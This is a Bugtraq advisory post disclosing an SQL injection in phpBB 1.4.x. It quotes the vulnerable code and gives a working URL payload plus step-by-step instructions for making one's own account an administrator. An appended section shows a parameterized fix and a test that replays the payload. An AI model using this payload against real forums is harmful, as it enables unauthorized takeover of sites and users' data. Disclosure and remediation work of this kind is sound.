Bugtraq mailing list archives
phpBB 1.4.0 bug leads to easy admin privileges
From: <kill-9 () modernhackers com>
Date: 3 Aug 2001 19:51:28 -0000
-New phpBB 1.4.x exploit

phpBB is an open source bulletin board created by the phpBB group. Version 1.4.x of phpBB has a variable input validation problem that can lead to limited arbitrary SQL queries, including gaining administrative access to the board.

The problem lies in the fact that phpBB 1.4.x includes an algorithm in the auth.php file which removes the backslashes that PHP automatically adds to GPC (Get/Post/Cookie) variables.

<Example code from auth.php>
if(get_magic_quotes_gpc() == 1)
{
    switch($REQUEST_METHOD)
    {
        case "POST":
            while (list ($key, $val) = each ($HTTP_POST_VARS))
            {
                if( is_array($val) )
                {
                    array_walk($val, 'stripslashes_array', '');
                    $$key = $val;
                }
                else
                {
                    $$key = stripslashes($val);
                }
            }
            break;
</ End example code>

Therefore, certain PHP variables submitted through a URL can reach an SQL query with unescaped quotes, which is not good for security reasons. Such a situation exists in the prefs.php file, where a user can execute an arbitrary query by supplying a certain value for the $viewemail variable.

< Example sql query in prefs.php >
$sql = "UPDATE users SET
            user_viewemail='$viewemail',
            user_theme='$themes',
            user_attachsig = '$sig',
            user_desmile = '$smile',
            user_html = '$dishtml',
            user_bbcode = '$disbbcode',
            user_lang = '$lang'
        WHERE (user_id = '$userdata[user_id]')";
</ End example code >

The example URL gives the username "l337h4x0r" level 4 (administrative) privileges on the board:

<Example URL>
http://sitename/phpBBfolder/prefs.php?save=1
&viewemail=1',user_level%3D'4'%20where%
20username%3D'l337h4x0r'%23
</ End example URL>

Summary:
1. Register an account on a phpBB board version 1.4.x.
2. Enter above URL with the correct sitename and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of the page.

found by: kill-9 () modernhacker com
http://www.modernhacker.com
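An added example (not part of the original post, and not phpBB code) of how the prefs.php update can be written so that the quoted $viewemail value cannot change the statement: flags are reduced to 0/1, the language is checked against an allow-list, and every value is bound as a parameter. The function save_prefs(), the allow-list, the in-memory SQLite database (pdo_sqlite) and the sample row are assumptions made for the illustration.

```php
<?php
// Added example, not phpBB code. Column names come from the query quoted in the
// post; save_prefs(), the allow-list and the in-memory SQLite DB are assumptions.

const ALLOWED_LANGS = ['english', 'german', 'french'];   // constructed allow-list

function save_prefs(PDO $db, int $sessionUserId, array $input): void
{
    // Flags are reduced to 0/1; anything other than the literal "1" becomes 0.
    $flag = static fn(string $k): int => (($input[$k] ?? '0') === '1') ? 1 : 0;

    // Free-form choices are checked against a fixed list, not passed through.
    $lang = in_array($input['lang'] ?? '', ALLOWED_LANGS, true) ? $input['lang'] : 'english';

    // Placeholders keep request data out of the SQL text, and the row is
    // selected by the server-side session id, never by a request value.
    $stmt = $db->prepare(
        'UPDATE users SET user_viewemail = :viewemail, user_attachsig = :sig,
                user_lang = :lang
          WHERE user_id = :uid'
    );
    $stmt->execute([
        ':viewemail' => $flag('viewemail'),
        ':sig'       => $flag('sig'),
        ':lang'      => $lang,
        ':uid'       => $sessionUserId,
    ]);
}

// Constructed demo data: one ordinary user (level 1).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT,
           user_level INTEGER, user_viewemail INTEGER, user_attachsig INTEGER, user_lang TEXT)");
$db->exec("INSERT INTO users VALUES (7, 'l337h4x0r', 1, 0, 0, 'english')");

// The viewemail value from the post's example URL, after URL decoding.
$request = ['viewemail' => "1',user_level='4' where username='l337h4x0r'#", 'sig' => '1'];
save_prefs($db, 7, $request);

$row = $db->query('SELECT user_level, user_viewemail, user_attachsig FROM users WHERE user_id = 7')
          ->fetch(PDO::FETCH_ASSOC);
if ((int) $row['user_level'] !== 1) {
    throw new RuntimeException('user_level was modified by request data');
}
echo "user_level unchanged; viewemail stored as {$row['user_viewemail']}\n";
```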